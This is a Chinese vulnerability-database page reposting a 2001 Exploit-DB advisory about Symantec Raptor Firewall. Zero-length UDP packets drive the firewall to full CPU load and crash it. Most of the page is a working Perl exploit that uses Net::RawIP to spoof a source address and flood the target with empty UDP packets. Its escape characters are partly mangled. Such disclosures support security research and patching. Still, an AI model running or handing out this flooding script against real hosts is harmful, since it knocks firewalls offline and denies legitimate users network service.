Raptor Firewall 4.0/5.0/6.0.x – Zero Length UDP Packet Resource Consumption

Raptor Firewall 4.0/5.0/6.0.x – Zero Length UDP Packet Resource Consumption

漏洞ID 1053539 漏洞类型
发布时间 2001-06-21 更新时间 2001-06-21
图片[1]-Raptor Firewall 4.0/5.0/6.0.x – Zero Length UDP Packet Resource Consumption-安全小百科CVE编号 N/A
图片[2]-Raptor Firewall 4.0/5.0/6.0.x – Zero Length UDP Packet Resource Consumption-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/21143
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/3509/info

Raptor Firewall is a commercially available firewall implementation distributed by Symantec.

A problem with the handling of UDP packets by the firewall has been discovered. When the firewall receives zero length UDP packets, the machine hosting the firewall becomes processor bound, with the firewall taking 100% of the CPU.

This makes it possible for a remote user to crash the firewall, denying service to legitimate users of network resources. A reboot is required for the system to resume normal operation. 

#!/usr/bin/perl 
###################################
# This Code is for education only #
###################################
# Greetings to kitchen from #perl on irc openproject.net
# For the help on some perl questions.
# Firewalls are hard on the outside and crunchy on the inside
#
# The Rapor Firewall UDP-GSP (UDP-Proxy) gets 100% CPU load
# When getting UDP-Packets with no Data init
#
# Written 21.Jun 2001 by Max Moser [email protected] 
#
# http://www.remote-exploit.org
# 

use Net::RawIP;
use Getopt::Long;

GetOptions('src=s','dst=s','num=i');

if (!$opt_src | !$opt_dst | !$opt_num ){
	print "nUsage parameters for ".$0.":n";
	print "t--srct IP-Sourceaddressn";
	print "t--dstt IP-Destinationaddressn";
	print "t--numt Numer of UDP packets to sendn";
	print "nExample:n";
	print "t".$0." --src=192.168.0.1 --dst=192.168.0.354 --num=1000nnn";
	exit(1);
};

# Some defines
$| = 1;
@anim= ("\","|","/","-","\","|","/","-");
$source=$opt_src;
$destination=$opt_dst;
$numpack=$opt_num;

print "nntSending packets now  ";
for($x=0;$x<$numpack;$x=$x+1){
	my $sport=(rand(65534)+1);
	my $dport=(rand(1024)+1);
	my $c=new Net::RawIP({udp=>{source=>$sport,dest=>$dport}});
        $c->set({ip=>{saddr=>$source,daddr=>$destination},{udp}});
        $c->send;
        undef $c;
	for ($y=0;$y<8;$y=$y+1){
		print "b" . $anim[$y];
		select (undef,undef,undef,0.01);
		if ($y==8){ $y=0};  	
	};
};

print "nnnSuccessfully sent ".$numpack." packets to ". $destination . "nn";

相关推荐: SCO OpenServer accept Buffer Overflow Vulnerability

SCO OpenServer accept Buffer Overflow Vulnerability 漏洞ID 1103326 漏洞类型 Boundary Condition Error 发布时间 2001-04-13 更新时间 2001-04-13 CVE…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享